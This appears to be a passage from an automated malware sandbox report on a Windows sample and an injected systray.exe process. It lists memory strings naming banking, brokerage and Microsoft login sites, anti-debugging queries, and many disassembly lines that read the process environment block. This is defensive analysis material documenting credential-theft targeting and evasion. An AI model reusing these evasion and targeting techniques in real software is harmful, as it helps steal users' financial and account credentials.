            Source: 382-I9W6.8.drBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
            Source: 382-I9W6.8.drBinary or memory string: outlook.office365.comVMware20,11696494690t
            Source: 382-I9W6.8.drBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
            Source: 382-I9W6.8.drBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
            Source: 382-I9W6.8.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
            Source: systray.exe, 00000008.00000002.3260476733.0000000003492000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: 382-I9W6.8.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
            Source: ZkqZZBQxQqm.exe, 00000009.00000002.3261162514.0000000001159000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: 382-I9W6.8.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
            Source: 382-I9W6.8.drBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
            Source: 382-I9W6.8.drBinary or memory string: tasks.office.comVMware20,11696494690o
            Source: firefox.exe, 0000000C.00000002.2077716909.00000150A130C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8
            Source: 382-I9W6.8.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
            Source: 382-I9W6.8.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
            Source: 382-I9W6.8.drBinary or memory string: dev.azure.comVMware20,11696494690j
            Source: 382-I9W6.8.drBinary or memory string: global block list test formVMware20,11696494690
            Source: 382-I9W6.8.drBinary or memory string: turbotax.intuit.comVMware20,11696494690t
            Source: 382-I9W6.8.drBinary or memory string: bankofamerica.comVMware20,11696494690x
            Source: 382-I9W6.8.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
            Source: 382-I9W6.8.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
            Source: 382-I9W6.8.drBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
            Source: 382-I9W6.8.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
            Source: 382-I9W6.8.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
            Source: 382-I9W6.8.drBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\systray.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FB096E rdtsc 3_2_00FB096E
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00417193 LdrLoadDll,3_2_00417193
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F6C0F0 mov eax, dword ptr fs:[00000030h]3_2_00F6C0F0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FB20F0 mov ecx, dword ptr fs:[00000030h]3_2_00FB20F0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_0101E10E mov eax, dword ptr fs:[00000030h]3_2_0101E10E
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_0101E10E mov ecx, dword ptr fs:[00000030h]3_2_0101E10E
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_0101E10E mov eax, dword ptr fs:[00000030h]3_2_0101E10E
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_0101E10E mov eax, dword ptr fs:[00000030h]3_2_0101E10E
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_0101E10E mov ecx, dword ptr fs:[00000030h]3_2_0101E10E
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_0101E10E mov eax, dword ptr fs:[00000030h]3_2_0101E10E
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_0101E10E mov eax, dword ptr fs:[00000030h]3_2_0101E10E
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_0101E10E mov ecx, dword ptr fs:[00000030h]3_2_0101E10E
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_0101E10E mov eax, dword ptr fs:[00000030h]3_2_0101E10E
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_0101E10E mov ecx, dword ptr fs:[00000030h]3_2_0101E10E
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F6A0E3 mov ecx, dword ptr fs:[00000030h]3_2_00F6A0E3
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_01030115 mov eax, dword ptr fs:[00000030h]3_2_01030115
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_0101A118 mov ecx, dword ptr fs:[00000030h]3_2_0101A118
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_0101A118 mov eax, dword ptr fs:[00000030h]3_2_0101A118
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_0101A118 mov eax, dword ptr fs:[00000030h]3_2_0101A118
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_0101A118 mov eax, dword ptr fs:[00000030h]3_2_0101A118
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F780E9 mov eax, dword ptr fs:[00000030h]3_2_00F780E9
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FF60E0 mov eax, dword ptr fs:[00000030h]3_2_00FF60E0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FF20DE mov eax, dword ptr fs:[00000030h]3_2_00FF20DE
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_01004144 mov eax, dword ptr fs:[00000030h]3_2_01004144
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_01004144 mov eax, dword ptr fs:[00000030h]3_2_01004144
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_01004144 mov ecx, dword ptr fs:[00000030h]3_2_01004144
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_01004144 mov eax, dword ptr fs:[00000030h]3_2_01004144
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_01004144 mov eax, dword ptr fs:[00000030h]3_2_01004144
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_01008158 mov eax, dword ptr fs:[00000030h]3_2_01008158
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F7208A mov eax, dword ptr fs:[00000030h]3_2_00F7208A
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_01014180 mov eax, dword ptr fs:[00000030h]3_2_01014180
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_01014180 mov eax, dword ptr fs:[00000030h]3_2_01014180
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_0102C188 mov eax, dword ptr fs:[00000030h]3_2_0102C188
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_0102C188 mov eax, dword ptr fs:[00000030h]3_2_0102C188
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F9C073 mov eax, dword ptr fs:[00000030h]3_2_00F9C073
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F72050 mov eax, dword ptr fs:[00000030h]3_2_00F72050
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FF6050 mov eax, dword ptr fs:[00000030h]3_2_00FF6050
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_010361C3 mov eax, dword ptr fs:[00000030h]3_2_010361C3
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_010361C3 mov eax, dword ptr fs:[00000030h]3_2_010361C3
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F6A020 mov eax, dword ptr fs:[00000030h]3_2_00F6A020
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F6C020 mov eax, dword ptr fs:[00000030h]3_2_00F6C020
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_010461E5 mov eax, dword ptr fs:[00000030h]3_2_010461E5
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F8E016 mov eax, dword ptr fs:[00000030h]3_2_00F8E016
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F8E016 mov eax, dword ptr fs:[00000030h]3_2_00F8E016
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F8E016 mov eax, dword ptr fs:[00000030h]3_2_00F8E016
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F8E016 mov eax, dword ptr fs:[00000030h]3_2_00F8E016
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FF4000 mov ecx, dword ptr fs:[00000030h]3_2_00FF4000
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_01012000 mov eax, dword ptr fs:[00000030h]3_2_01012000
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_01012000 mov eax, dword ptr fs:[00000030h]3_2_01012000
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_01012000 mov eax, dword ptr fs:[00000030h]3_2_01012000
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_01012000 mov eax, dword ptr fs:[00000030h]3_2_01012000
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_01012000 mov eax, dword ptr fs:[00000030h]3_2_01012000
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_01012000 mov eax, dword ptr fs:[00000030h]3_2_01012000
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_01012000 mov eax, dword ptr fs:[00000030h]3_2_01012000
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_01012000 mov eax, dword ptr fs:[00000030h]3_2_01012000
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FA01F8 mov eax, dword ptr fs:[00000030h]3_2_00FA01F8
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FEE1D0 mov eax, dword ptr fs:[00000030h]3_2_00FEE1D0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FEE1D0 mov eax, dword ptr fs:[00000030h]3_2_00FEE1D0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FEE1D0 mov ecx, dword ptr fs:[00000030h]3_2_00FEE1D0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FEE1D0 mov eax, dword ptr fs:[00000030h]3_2_00FEE1D0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FEE1D0 mov eax, dword ptr fs:[00000030h]3_2_00FEE1D0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_01006030 mov eax, dword ptr fs:[00000030h]3_2_01006030
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FF019F mov eax, dword ptr fs:[00000030h]3_2_00FF019F
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FF019F mov eax, dword ptr fs:[00000030h]3_2_00FF019F
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FF019F mov eax, dword ptr fs:[00000030h]3_2_00FF019F
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FF019F mov eax, dword ptr fs:[00000030h]3_2_00FF019F
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F6A197 mov eax, dword ptr fs:[00000030h]3_2_00F6A197
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F6A197 mov eax, dword ptr fs:[00000030h]3_2_00F6A197
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F6A197 mov eax, dword ptr fs:[00000030h]3_2_00F6A197
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FB0185 mov eax, dword ptr fs:[00000030h]3_2_00FB0185
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F6C156 mov eax, dword ptr fs:[00000030h]3_2_00F6C156
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F76154 mov eax, dword ptr fs:[00000030h]3_2_00F76154
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F76154 mov eax, dword ptr fs:[00000030h]3_2_00F76154
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_010080A8 mov eax, dword ptr fs:[00000030h]3_2_010080A8
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_010360B8 mov eax, dword ptr fs:[00000030h]3_2_010360B8
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_010360B8 mov ecx, dword ptr fs:[00000030h]3_2_010360B8
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FA0124 mov eax, dword ptr fs:[00000030h]3_2_00FA0124
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F802E1 mov eax, dword ptr fs:[00000030h]3_2_00F802E1
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F802E1 mov eax, dword ptr fs:[00000030h]3_2_00F802E1
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F802E1 mov eax, dword ptr fs:[00000030h]3_2_00F802E1
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F7A2C3 mov eax, dword ptr fs:[00000030h]3_2_00F7A2C3
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F7A2C3 mov eax, dword ptr fs:[00000030h]3_2_00F7A2C3
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F7A2C3 mov eax, dword ptr fs:[00000030h]3_2_00F7A2C3
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F7A2C3 mov eax, dword ptr fs:[00000030h]3_2_00F7A2C3
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F7A2C3 mov eax, dword ptr fs:[00000030h]3_2_00F7A2C3
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_0103A352 mov eax, dword ptr fs:[00000030h]3_2_0103A352
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_01018350 mov ecx, dword ptr fs:[00000030h]3_2_01018350
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F802A0 mov eax, dword ptr fs:[00000030h]3_2_00F802A0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F802A0 mov eax, dword ptr fs:[00000030h]3_2_00F802A0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FF0283 mov eax, dword ptr fs:[00000030h]3_2_00FF0283
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FF0283 mov eax, dword ptr fs:[00000030h]3_2_00FF0283
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FF0283 mov eax, dword ptr fs:[00000030h]3_2_00FF0283
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_0101437C mov eax, dword ptr fs:[00000030h]3_2_0101437C
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FAE284 mov eax, dword ptr fs:[00000030h]3_2_00FAE284
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FAE284 mov eax, dword ptr fs:[00000030h]3_2_00FAE284
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F74260 mov eax, dword ptr fs:[00000030h]3_2_00F74260
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F74260 mov eax, dword ptr fs:[00000030h]3_2_00F74260
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F74260 mov eax, dword ptr fs:[00000030h]3_2_00F74260
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F6826B mov eax, dword ptr fs:[00000030h]3_2_00F6826B
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F6A250 mov eax, dword ptr fs:[00000030h]3_2_00F6A250
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F76259 mov eax, dword ptr fs:[00000030h]3_2_00F76259
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FF8243 mov eax, dword ptr fs:[00000030h]3_2_00FF8243
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FF8243 mov ecx, dword ptr fs:[00000030h]3_2_00FF8243
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F6823B mov eax, dword ptr fs:[00000030h]3_2_00F6823B
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_0102C3CD mov eax, dword ptr fs:[00000030h]3_2_0102C3CD
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_010143D4 mov eax, dword ptr fs:[00000030h]3_2_010143D4
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_010143D4 mov eax, dword ptr fs:[00000030h]3_2_010143D4
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_0101E3DB mov eax, dword ptr fs:[00000030h]3_2_0101E3DB
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_0101E3DB mov eax, dword ptr fs:[00000030h]3_2_0101E3DB
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_0101E3DB mov ecx, dword ptr fs:[00000030h]3_2_0101E3DB
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_0101E3DB mov eax, dword ptr fs:[00000030h]3_2_0101E3DB
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FA63FF mov eax, dword ptr fs:[00000030h]3_2_00FA63FF
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F8E3F0 mov eax, dword ptr fs:[00000030h]3_2_00F8E3F0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F8E3F0 mov eax, dword ptr fs:[00000030h]3_2_00F8E3F0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F8E3F0 mov eax, dword ptr fs:[00000030h]3_2_00F8E3F0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F803E9 mov eax, dword ptr fs:[00000030h]3_2_00F803E9
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F803E9 mov eax, dword ptr fs:[00000030h]3_2_00F803E9
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F803E9 mov eax, dword ptr fs:[00000030h]3_2_00F803E9
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F803E9 mov eax, dword ptr fs:[00000030h]3_2_00F803E9
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F803E9 mov eax, dword ptr fs:[00000030h]3_2_00F803E9
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F803E9 mov eax, dword ptr fs:[00000030h]3_2_00F803E9
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F803E9 mov eax, dword ptr fs:[00000030h]3_2_00F803E9
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F803E9 mov eax, dword ptr fs:[00000030h]3_2_00F803E9
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F7A3C0 mov eax, dword ptr fs:[00000030h]3_2_00F7A3C0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F7A3C0 mov eax, dword ptr fs:[00000030h]3_2_00F7A3C0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F7A3C0 mov eax, dword ptr fs:[00000030h]3_2_00F7A3C0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F7A3C0 mov eax, dword ptr fs:[00000030h]3_2_00F7A3C0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F7A3C0 mov eax, dword ptr fs:[00000030h]3_2_00F7A3C0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F7A3C0 mov eax, dword ptr fs:[00000030h]3_2_00F7A3C0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F783C0 mov eax, dword ptr fs:[00000030h]3_2_00F783C0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F783C0 mov eax, dword ptr fs:[00000030h]3_2_00F783C0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F783C0 mov eax, dword ptr fs:[00000030h]3_2_00F783C0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F783C0 mov eax, dword ptr fs:[00000030h]3_2_00F783C0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FF63C0 mov eax, dword ptr fs:[00000030h]3_2_00FF63C0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_0102A250 mov eax, dword ptr fs:[00000030h]3_2_0102A250
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_0102A250 mov eax, dword ptr fs:[00000030h]3_2_0102A250
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F68397 mov eax, dword ptr fs:[00000030h]3_2_00F68397
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F68397 mov eax, dword ptr fs:[00000030h]3_2_00F68397
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F68397 mov eax, dword ptr fs:[00000030h]3_2_00F68397
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_01020274 mov eax, dword ptr fs:[00000030h]3_2_01020274
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_01020274 mov eax, dword ptr fs:[00000030h]3_2_01020274
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_01020274 mov eax, dword ptr fs:[00000030h]3_2_01020274
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_01020274 mov eax, dword ptr fs:[00000030h]3_2_01020274
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_01020274 mov eax, dword ptr fs:[00000030h]3_2_01020274
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_01020274 mov eax, dword ptr fs:[00000030h]3_2_01020274
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_01020274 mov eax, dword ptr fs:[00000030h]3_2_01020274
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_01020274 mov eax, dword ptr fs:[00000030h]3_2_01020274
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_01020274 mov eax, dword ptr fs:[00000030h]3_2_01020274
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_01020274 mov eax, dword ptr fs:[00000030h]3_2_01020274
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_01020274 mov eax, dword ptr fs:[00000030h]3_2_01020274
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_01020274 mov eax, dword ptr fs:[00000030h]3_2_01020274
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F9438F mov eax, dword ptr fs:[00000030h]3_2_00F9438F
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F9438F mov eax, dword ptr fs:[00000030h]3_2_00F9438F
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F6E388 mov eax, dword ptr fs:[00000030h]3_2_00F6E388
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F6E388 mov eax, dword ptr fs:[00000030h]3_2_00F6E388
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F6E388 mov eax, dword ptr fs:[00000030h]3_2_00F6E388
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_010062A0 mov eax, dword ptr fs:[00000030h]3_2_010062A0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_010062A0 mov ecx, dword ptr fs:[00000030h]3_2_010062A0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_010062A0 mov eax, dword ptr fs:[00000030h]3_2_010062A0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_010062A0 mov eax, dword ptr fs:[00000030h]3_2_010062A0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_010062A0 mov eax, dword ptr fs:[00000030h]3_2_010062A0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_010062A0 mov eax, dword ptr fs:[00000030h]3_2_010062A0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FF035C mov eax, dword ptr fs:[00000030h]3_2_00FF035C
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FF035C mov eax, dword ptr fs:[00000030h]3_2_00FF035C
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FF035C mov eax, dword ptr fs:[00000030h]3_2_00FF035C
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FF035C mov ecx, dword ptr fs:[00000030h]3_2_00FF035C
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FF035C mov eax, dword ptr fs:[00000030h]3_2_00FF035C
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FF035C mov eax, dword ptr fs:[00000030h]3_2_00FF035C
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FF2349 mov eax, dword ptr fs:[00000030h]3_2_00FF2349
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FF2349 mov eax, dword ptr fs:[00000030h]3_2_00FF2349
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FF2349 mov eax, dword ptr fs:[00000030h]3_2_00FF2349
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FF2349 mov eax, dword ptr fs:[00000030h]3_2_00FF2349
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FF2349 mov eax, dword ptr fs:[00000030h]3_2_00FF2349
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FF2349 mov eax, dword ptr fs:[00000030h]3_2_00FF2349
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FF2349 mov eax, dword ptr fs:[00000030h]3_2_00FF2349
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FF2349 mov eax, dword ptr fs:[00000030h]3_2_00FF2349
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FF2349 mov eax, dword ptr fs:[00000030h]3_2_00FF2349
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FF2349 mov eax, dword ptr fs:[00000030h]3_2_00FF2349
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FF2349 mov eax, dword ptr fs:[00000030h]3_2_00FF2349
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FF2349 mov eax, dword ptr fs:[00000030h]3_2_00FF2349
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FF2349 mov eax, dword ptr fs:[00000030h]3_2_00FF2349
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FF2349 mov eax, dword ptr fs:[00000030h]3_2_00FF2349
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FF2349 mov eax, dword ptr fs:[00000030h]3_2_00FF2349
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F6C310 mov ecx, dword ptr fs:[00000030h]3_2_00F6C310
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F90310 mov ecx, dword ptr fs:[00000030h]3_2_00F90310
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FAA30B mov eax, dword ptr fs:[00000030h]3_2_00FAA30B
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FAA30B mov eax, dword ptr fs:[00000030h]3_2_00FAA30B
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FAA30B mov eax, dword ptr fs:[00000030h]3_2_00FAA30B
